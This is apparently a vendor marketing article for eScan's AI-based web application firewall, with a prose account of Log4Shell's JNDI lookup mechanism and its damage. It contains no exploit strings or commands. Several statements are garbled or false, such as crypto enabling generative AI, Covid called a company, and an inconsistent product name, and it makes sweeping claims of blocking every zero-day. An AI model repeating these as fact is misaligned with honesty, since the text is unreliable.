Using innovative technologies like big data and AI to monitor and preempt potential attacks, cloud-native security measures are primarily concerned with safeguarding against identifiable threats. Yet, no system is completely impervious to threats, no matter how much effort is put into it. Despite state-of-the-art protections, cloud security is never truly good enough if vulnerabilities remain undetected. By implementing eScan’s next-generation Web Application and API Protection, you can mitigate unknown risks and enhance your overall security posture.
There are known risk indicators that a security expert focuses on.
The majority of our industry focuses on determining ways to avoid coding errors and identifying potential avenues for attackers to exploit. In general, however, the most dangerous attacks are those that catch us totally unprepared, and we only realize they are present once they have already started attacking. Today, we’ll be discussing how to identify these types of threats early on, and how to prevent them all together with eScan Ultra.
A brief history of cloud so far
With our new ability to run much stronger algorithms, it began around 12 years ago.
- Data was finally collected and analyzed in a big way… in fact, that’s what we called it: big data.
- It was also necessary to store the data cost-effectively, which led to the creation of virtual network.
- As mobile applications exploded all over the globe, data suddenly needed to move around and be everywhere… thus, cloud ISPs were born. By implementing everything as scalable code, everything was broken down into services that ran on virtual machines that became active when needed.
- Our data was optimized and deep insights were generated through the use of machine learning at this point.
- Kubernetes allows developers and service providers to code and run services more precisely.
- GPU processing and generative AI were made possible by crypto.
- Lastly, Covid was the company that gave the cloud its biggest boost.
Cloud services are necessary because of remote endpoints, data accessibility from anywhere, and the speed of technology. There are currently thousands of businesses in the cloud today, including small businesses and large enterprises.
Cloud computing is not a problem – it’s a solution.
As the Cloud matures to a point where its presence is ubiquitous, it has become an integral part of our daily lives. Professionals often become absorbed in resolving the challenges associated with cloud computing, and it is easy to lose sight of the magnificent nature of the cloud. We now have access to a wide range of benefits and opportunities previously unimaginable. There have also been some problems associated with it, however.
It is vital that we comprehend that the cloud is not the problem; it is the solution. Utilizing the cloud in the future will improve security measures and increase the impact of what we do.
Data exchange occurs via two main channels: The cloud front door, where users submit requests for various services from the cloud application via public internet, mobile networks, and VPNs. There is also the service door, from where code and data are constantly pushed into the application. In essence, we protect the wiring. To ensure that the exchange is safe, we analyze each request and use tools to confirm that it makes sense.
Every request from a user poses a potential risk ….
Although this wealth of data can also be a source of trouble, as it is exchanged through various channels and hybrid clouds. With this simplified supply chain diagram, you can easily see the many components exchanging data and potentially serving as backdoors for hackers.
Whenever data is exchanged between components, there is a risk of it being compromised or manipulated. Additionally, you are relying on so many third party feeds and services for data sharing, and these may also be at risk.
Providing our troops with training, securing our assets in the field, and defending ourselves are all important… but we should aim to prevent war in the first place. ….
As part of our security strategy, we employ various measures, including a WAF for the front door, a CSPM for the cloud contents, and code scanning and network security for the endpoints. These measures give us confidence that any known risks can be managed. It is important, however, that we remain vigilant and adaptable in our approach to security since unknown risks cannot be ruled out.
Here are a few basic definitions to help us understand what we are protecting ourselves from:
The things we do ourselves can expose us to vulnerabilities, such as:
- Credentials that are misconfigured or hidden,
- Some known vulnerabilities may allow malicious activity until they are patched and…
An open database of attack indicators, such as suspicious behavioural patterns, malicious IP addresses, and attack patterns, generates dynamic risk indicators.
By continuously monitoring these indicators and issues, we can provide posture, protection, and zero-tolerance across your application network.
Unknown vulnerabilities may be:
- An undiscovered software vulnerability may cause a software component to deviate from its original assignment, allowing access or manipulation.
- Exploitable backdoors – intentionally designed (for example, forgotten password functions) and unintentionally installed – by malicious actors or software
- In addition, there are also several new attack techniques and methods that hackers are constantly inventing that we do not know about yet.…
The problem is that we don’t really know how to protect against these unknown risks – it’s what attackers are looking for, which is one of the reasons why zero-day exploits are so common.
We cannot know CVEs until they have been signed
To keep security teams updated with the latest problems and often with their solutions and patches, we mainly communicate unknown vulnerabilities using CVEs or Common Vulnerability and Exposures..
Globally, more than 25,000 CVEs have been reported by internet users so far in 2022 – the highest number on record. The poor security guy would have to deal with an average of 68 CVEs, of which one-third would be high or critical risks. There are 68 new CVEs every single day of the year, that’s 68 NEW CVEs every single day.
In addition, it is also important to recognize that resolving CVEs takes 65 days on average, so until there is a patch to fix the core issue, you depend on WAFs for protection. Your WAFs are blind to unknown attacks until a signature is released.
Here is our main use case: log4shell.
There are many reasons why Log4Shell is a great example:
- There are hundreds of millions of machines that use Log4j, a Java logging library. Almost every large application utilizes it in some way or another.
- During its first 72 hours, the website was hacked over 800,000 times, both because it was easy to hack and that attackers were able to gain deep access.
- In terms of attacks since 2021, it is almost impossible to determine the number. However, we do estimate that over 1.5 billion dollars worth of damage has occurred, so this should give you some indication.
- There’s also an interesting fact: 1 out of 4 apps still uses problematic log4j versions, which can’t be reached from anywhere.
Log4shell also shows how things can get worse before they improve.
- Generally, vulnerabilities are discovered and assigned CVE numbers within two days after discovery.
- Within a week of December first, wild exploitation had already been detected.
- After Apache publicly announced the vulnerability on December 9th – which included a patch for affected log4j2– the real mess began. In the beginning, it seemed organizations could begin mitigation immediately; however, it took Apache five long days to realize that the even more popular log4j1 was in fact vulnerable, so patching had to start from scratch.
- The situation was further complicated on Dec 17th when an additional CVE was released that disclosed many more exploit scenarios… It took security teams 35 days to begin patching critical assets after more than a month of issues and variants were still being disclosed. Here’s the simple math: if it took 35 days to contain, and it’ll take an additional 65 days to remediate, that means you’re exposed for a hundred days! That’s a lot of days.
- A Java logging vulnerability makes it easy for an attacker to attach a malicious string to a login or search request.
Using Log4Shell, you can alter event logs programmatically by inserting strings that call for external content in response to messages in Log4j. In this case, the code implemented this feature by using the Java Naming and Directory Interface (JNDI) URLs for “lookups“. LDAP logging servers use Log4j to log data, so the attacker need only insert text with embedded malicious JNDI URLs into requests to log data – these URLs cause remote code to be loaded and executed. This vulnerability has been exploited by attackers for breaking into virtualization infrastructure, installing and executing ransomware, stealing system credentials, and gaining access to compromised networks.
The analysis of static data to the analysis of contextual data
Did you know there was a way to block log4Shell? YES, that’s the simple answer. To achieve this, machine learning and artificial intelligence must be used to their fullest extent.
As artificial intelligence has evolved, we have been able to do many incredible things – from optimizing the way we handle large amounts of data to improving processes… With CNAPP and data consolidation, we can now analyze our threat data in its entirety and gain insights that will help us improve and scale our security.
Wouldn’t it be better if we could use the same AI to look inward rather than outward? With a deep understanding of the application’s normal behaviour, we should be able to detect anything that is out of the norm and block it!
Here’s how we use eSacn Cloud Security WAF to achieve just that.
Using a patented machine learning engine, the Cloud Security WAF continuously analyzes users’ web and API requests over HTTP. WAF’s AI engine learns how users normally interact with your web application and automatically detects requests outside of normal operations. To determine whether or not these requests are malicious, they are further analyzed. Because of this precision, we can block issues without relying on signatures or rules to detect them.
Web application firewalls like eScan Cloud Security WAF are the next generation. As a result of its distributed nature, it intercepts all HTTP interactions and analyses them in real-time within the cloud environment. To protect against both known and unknown threats, eScan CloudGuard WAF uses two steps rather than signatures or rules.
A machine-learning-based enforcement engine examines the HTTP request for attack indicators. Evaluations are based on a supervised model that identifies indicators and assigns a specific, statistical likelihood that they are part of an attack.
Scores are assigned for each indicator individually as well as for pairs of indicators. Furthermore, indicators are associated with particular attack families where they tend to occur. Based on the scoring process, eScan Cloud Security can estimate the attack likelihood of an HTTP request with great accuracy.
Here’s where your traditional WAF ends.
Nevertheless, the second part is the most interesting:
We analyze suspicious HTTP requests using the contextual machine learning evaluation engine to gain further confidence that all HTTP requests identified as potentially malicious are attacks. A number of additional parameters are correlated, including the application structure, the user/crowd behaviour, the content of the user, and the transactions.
The result is extremely accurate detection of irregular or harmful requests, resulting in blocking them from entering.
Throughout the past year, eScan Cloud Security WAF has successfully blocked ALL major zero-day attacks including Log4Shell, Spring4Shell, and MOVEit. Customers didn’t need to run any updates from day one, because they were protected from day one.
PROVEN PREVENTION-FORCE CLOUD SECURITY PLATFORM
A unified platform dedicated to securing your cloud environment, Cloud Security eScan provides a unified approach to cloud security. Using a prevention-first approach, it ensures consistency and repeatability between cloud providers. No matter where the risk originates, we protect you before it reaches production and at runtime against both known and unknown risks.
